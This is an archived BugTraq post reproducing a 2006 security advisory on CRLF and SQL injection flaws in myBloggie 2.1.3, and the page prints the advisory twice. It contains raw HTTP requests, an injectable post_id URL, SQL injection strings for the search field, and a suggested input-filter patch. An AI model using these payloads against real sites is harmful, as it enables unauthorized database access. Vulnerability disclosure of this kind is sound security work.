BugTraq
Back to list
|
Post reply
HYSA-2006-008 myBloggie 2.1.3 CRLF & SQL Injection
May 17 2006 12:59PM
h4cky0u org gmail com
------------------------------------------------------
HYSA-2006-008 h4cky0u.org Advisory 017
------------------------------------------------------
Date - Wed May 17 2006
TITLE:
======
myBloggie 2.1.3 CRLF & SQL Injection
SEVERITY:
=========
Medium
SOFTWARE:
=========
myBloggie 2.1.3
http://mybloggie.mywebland.com/
INFO:
=====
myBloggie is considered one of the most simple, user-friendliest yet packed with features
Weblog system available to date.
DESCRIPTION:
============
--==CRLF injection==--
GET /mybloggie/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=op0-11{}};q, or something like that
Connection: Close
GET /mybloggie/admin.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=op0-11{}};q, or something like that
Connection: Close
GET /mybloggie/index.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=op0-11{}};q, or something like that
Connection: Close
--==SQL injection==--
http://127.0.0.1/mybloggie/index.php?mode=viewid&post_id='
Also MurderSkillz discovered a bug in the search function. Here is a proof-of-concept:
1' having '1'='1'--
or
' or 'x'='x--
And a little patch from me:
if(ereg('[^A-Za-z0-9_]',$_POST['keyword'])){
echo "Invalid Characters";
exit;
}
if (isset($_GET['select'])) $select=$_GET['select'];
if (isset($_POST['keyword'])) $keyword=$_POST['keyword'];
$keyword = preg_replace($html_entities_match, $html_entities_replace,$keyword);
//....
VENDOR STATUS:
==============
Vendor was contacted but no response received till date.
CREDITS:
========
This vulnerability was discovered and researched by
matrix_killer of h4cky0u Security Forums.
mail : matrix_k at abv.bg
web : http://www.h4cky0u.org
Search function sql injection was discovered by: MurderSkillz
Co-Researcher:
h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at gmail.com
web : http://www.h4cky0u.org
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!
ORIGINAL ADVISORY:
==================
http://www.h4cky0u.org/advisories/HYSA-2006-008-mybloggie.txt
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
HYSA-2006-008 h4cky0u.org Advisory 017
------------------------------------------------------
Date - Wed May 17 2006
TITLE:
======
myBloggie 2.1.3 CRLF & SQL Injection
SEVERITY:
=========
Medium
SOFTWARE:
=========
myBloggie 2.1.3
http://mybloggie.mywebland.com/
INFO:
=====
myBloggie is considered one of the most simple, user-friendliest yet packed with features
Weblog system available to date.
DESCRIPTION:
============
--==CRLF injection==--
GET /mybloggie/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=op0-11{}};q, or something like that
Connection: Close
GET /mybloggie/admin.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=op0-11{}};q, or something like that
Connection: Close
GET /mybloggie/index.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=op0-11{}};q, or something like that
Connection: Close
--==SQL injection==--
http://127.0.0.1/mybloggie/index.php?mode=viewid&post_id='
Also MurderSkillz discovered a bug in the search function. Here is a proof-of-concept:
1' having '1'='1'--
or
' or 'x'='x--
And a little patch from me:
if(ereg('[^A-Za-z0-9_]',$_POST['keyword'])){
echo "Invalid Characters";
exit;
}
if (isset($_GET['select'])) $select=$_GET['select'];
if (isset($_POST['keyword'])) $keyword=$_POST['keyword'];
$keyword = preg_replace($html_entities_match, $html_entities_replace,$keyword);
//....
VENDOR STATUS:
==============
Vendor was contacted but no response received till date.
CREDITS:
========
This vulnerability was discovered and researched by
matrix_killer of h4cky0u Security Forums.
mail : matrix_k at abv.bg
web : http://www.h4cky0u.org
Search function sql injection was discovered by: MurderSkillz
Co-Researcher:
h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at gmail.com
web : http://www.h4cky0u.org
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!
ORIGINAL ADVISORY:
==================
http://www.h4cky0u.org/advisories/HYSA-2006-008-mybloggie.txt
[ reply ]